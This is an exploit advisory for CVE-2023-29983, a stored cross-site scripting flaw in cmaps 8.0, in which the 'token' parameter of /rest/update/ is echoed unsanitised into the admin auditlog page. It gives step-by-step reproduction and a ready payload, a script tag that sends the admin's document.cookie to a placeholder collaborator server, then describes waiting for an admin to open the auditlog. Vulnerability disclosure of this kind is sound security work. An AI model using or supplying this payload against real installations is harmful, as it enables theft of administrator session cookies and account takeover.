- Google Dork:
- Date: 27.04.2023
- Exploit Author: Lucas Noki (0xPrototype)
- Vendor Homepage: https://github.com/vogtmh
- Software Link: https://github.com/vogtmh/cmaps
- Version: 8.0
- Tested on: Mac, Windows, Linux
- CVE : CVE-2023-29983
Description:
The vulnerability found is Stored Cross Site Scripting. When the rest/update/?token= endpoint is hit with a request where the token parameter contains a malicious payload we have the possibility to sXSS. This happens because the input isn't sanitized. It gets written as is into the database. Then if an admin visits the auditlog tab, the request is taken out of the database and echoed directly into the page. This triggers the XSS everytime someone visits the auditlog or refreshes it.
Steps to reproduce:
- Clone the repository and install the application
- Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
- The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
- Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
- Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
- Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter
In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.
Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
